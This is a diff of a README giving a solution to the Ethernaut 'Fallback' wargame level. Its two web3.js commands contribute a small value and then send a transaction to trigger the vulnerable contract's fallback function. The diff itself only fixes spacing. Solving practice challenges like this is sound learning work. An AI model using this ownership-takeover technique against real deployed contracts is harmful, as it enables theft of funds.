gaurav-11018/Ethernaut/Fallback/README.md

 Solution:

-1.Your account address has to contribute to be mapped.
+1. Your account address has to contribute to be mapped.

 await contract.contribute({value:3})

-2.Trigger fallback function by sending transcation by using web3.js command.
+2. Trigger fallback function by sending transcation by using web3.js command.

 await contract.sendTransaction({value:3})